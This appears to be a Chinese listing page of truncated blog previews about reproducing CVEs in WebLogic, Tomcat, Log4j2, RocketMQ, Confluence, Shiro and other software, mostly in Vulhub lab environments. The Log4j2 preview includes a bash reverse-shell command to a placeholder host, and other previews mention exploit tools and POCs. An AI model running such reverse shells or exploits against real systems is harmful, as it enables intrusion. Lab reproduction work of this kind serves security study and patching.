CVE

Vulhub - Docker-Compose file for vulnerability environment 1、介绍 名称：Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628） 编号：CVE-2018-2628 原理： 应用：Webl ......

WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞复现 - FreeBuf网络安全行业门户 1、介绍 名称：weblogic XMLDecoder反序列化漏洞(CVE-2017-10271) 编号：CVE-2017-10271 原理：Weblogic的WLS Se ......

### Apache HTTPD 换行解析漏洞（CVE-2017-15715）【项目中遇到】 Apache HTTPD是一款HTTP服务器，它可以通过mod_php来运行PHP网页，其**2.4.0~2.4.29**版本中存在一个解析漏洞，在解析PHP时,**1.php\x0A将按照PHP后缀进行解 ......

上一篇CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)复现分析了第一部分也就是携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的，接下来我将分析exiftool漏洞的原理和最后的触发利用。 希望读者能读有所得，从中收获到自己独特的见解。 ......

> 文章写于2021-11-29，首发在[天融信阿尔法实验室](https://mp.weixin.qq.com/s/Y4mGVhbc3agp1adnUs1GmA) ## 前言 安全研究员`vakzz`于4月7日在hackerone上提交了一个关于gitlab的[RCE漏洞](https://hac ......

### Aapache Tomcat AJP 文件包含漏洞（CVE-2020-1938）【项目中遇到过】 **1. 背景简述** java是目前WEB开发中主流的编程语言，而Tomcat是当前流行的Java中间件服务器之一。 Ghostcat（幽灵猫）是由长亭科技安全研究员发现的存在于 Tomcat ......

### ActiveMQ任意文件写入漏洞（CVE-2016-3088）【现实项目遇到过】 **1. 环境搭建** ```sh cd vulhub-master/activemq/CVE-2016-3088 docker-compose up -d docker-compose config #查看靶 ......

漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti ......

# Confluence OGNL表达式注入命令执行漏洞（CVE-2022-26134） ## 简介 Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新，通告了一个严重且已在野利用的代码执行漏洞，攻击者利用这个漏洞即可无需 ......

Redis 3.2.x < 3.2.4 版本存在缓冲区溢出漏洞，可导致任意代码执行。Redis 数据结构存储 的 CONFIG SET 命令中 client-output-buffer-limit 选项处理存在越界写漏洞。构造的 CONFIG SET 命令可导致越界写，代码执行。 漏洞利用： 修改配 ......

# HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞) @[TOC](目录标题) ### 漏洞概述 ### http.sys介绍 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序，为了优化IIS服务器性能，从IIS6.0引入，IIS服务 ......

RocketMQ 5.1.0及以下版本，在一定条件下，存在远程命令执行风险。RocketMQ的NameServer、Broker、Controller等多个组件外网泄露，缺乏权限验证，攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。 此外，攻击者可以通过伪造 Roc... ......

# OpenSSH 资源管理错误漏洞(CVE-2021-28041) 漏洞描述： OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。 该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他 网络级 ......

Apache RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。CVE-2023-37582 中，由于对 CVE-2023-33246 修复不完善，导致在Apache RocketMQ NameServer 存在未授权访问的情况下，攻击者可构造恶意请求以RocketMQ运行的系... ......

# Windows漏洞CVE-2019-0708 标签（空格分隔）： 网络攻防技术 ###1.python-exp攻击 步骤 : (1)**开启Windows7的远程桌面服务**：在windows7系统中依次选择【控制面板】→【系统和安全】→【允许远程访问】打开远程访问服务。 (2)**下载漏洞利用 ......

Vulhub - Docker-Compose file for vulnerability environment 1、介绍 名称：Apache HTTPD 换行解析漏洞 编号：CVE-2017-15715 原理：Apache HTTPD是一款HTTP服务器，它可以通过mod_php来运行PHP网 ......

Nginx越界读取缓存漏洞(CVE-2017-7529） - FreeBuf网络安全行业门户 1、介绍 名称：tomcat后台弱口令war包上传部署 编号：CVE-2017-7529 原理：HTTP的range头可以指定start和end的值，然后返回请求文件指定大小的内容。对于一般文件而言，ran ......

参考链接：https://www.freebuf.com/articles/web/372862.html 漏洞简介 漏洞复现 开启vulhub靶场环境，确保shiro正常运行 cd vulhub-master/shiro/CVE-2016-4437 docker-compose up -d doc ......

（转载）修复 K8s SSL/TLS 漏洞（CVE-2016-2183）指南 前言 测试服务器配置 主机名IPCPU内存系统盘数据盘用途 zdeops-master 192.168.9.9 2 4 40 200 Ansible 运维控制节点 ks-k8s-master-0 192.168.9.91 ......

> 2023 年 7 月 24 日，Apache Shiro 发布更新版本，修复了一个身份验证绕过漏洞，漏洞编号：CVE-2023-34478，漏洞危害等级：高危。 Apache Shiro 版本 1.12.0 之前和 2.0.0-alpha-3 之前容易受到路径遍历攻击，当与基于非规范化请求路由请 ......

一、漏洞信息 CVE-2022-24481是发生在CLFS驱动中的一个类型混淆漏洞，通过精巧的对blf文件的部分数据进行构造，可使LogBlockHeader中的ClientContextOffset指向ContainContext，从而造成类型混淆。 二、测试环境及漏洞复现 测试环境 POC： 4 ......

2023年5月23日， Rocketmq 爆出 CVE-2023-33246 RCE高危漏洞。 在一定条件下， 攻击者可以利用该漏洞通过更新配置功能以RocketMQ运行的系统用户身份执行命令 。 漏洞利用与复现 攻击者成功RCE需要满足以下条件 Rocketmq 版本 < 5.1.1 或 < 4. ......

JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具，它可以通过一键生成前后端代码，无需写任何代码，让开发者更多关注业务逻辑。 ......

## 一、漏洞介绍 ### 1、相关背景 在web早期，页面都是以静态页面为主(如：HTML)，没有动态页面的说法，所有还没有动态语言(如：PHP、JSP等)后来Ngnix为支持PHP语言就将有出现php页面的请求给PHP相关程序来进行处理，然后将处理后的结果反馈给用户。而解决PHP的相关程序就是c ......

1、介绍 Tomcat 运行在 Windows 主机上，且启用了 HTTP PUT 请求方法，可通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件，造成任意代码执行。 影响版本：Apache Tomcat 7.0.0 – 7.0.81 2、测试 (1)vulhub存有该漏洞的靶场 3、修复方 ......

1、介绍 由于 Tomcat AJP 协议设计上存在缺陷，攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件，例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下，配合文件包含的利用还可以达到远程代 ......

产品介绍 SPIP是一个互联网发布系统，其中非常重视协作工作，多语言环境和Web作者的易用性。它是自由软件，在GNU/GPL许可证下分发。这意味着它可以用于任何互联网站点，无论是个人的还是机构的，非营利的还是商业的。 漏洞概述 SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行 ......

Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发，主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过 Http 利用 XML 加到一个搜索集合中。查询该集合也是通过 http 收到一个 XML/JSON 响应来实现。此次 7.1.0 之前版 ......

jellyfin是一种自由的软件媒体系统。用于控制和管理媒体和流媒体。通过多个应用程序从专用服务器向终端用户设备提供媒体。 jellyfin<10.7.1版本 攻击者恶意构造请求将允许从jellyfin服务器的文件系统中读取文件。当是windows主机问题更加普遍 漏洞复现 fofa搜索jellyf ......

一、前言 一般情况下，开发者配置鉴权时，可能都会遵循一个原则，就是"优先使用/**认证兜底，明确哪些接口无需认证，而不是明确哪些接口需要认证。 在Spring Controller中,以下两个路由访问是等价的（熟悉spring framework源码的话，会知道其实都是在解析pattern前做了补全 ......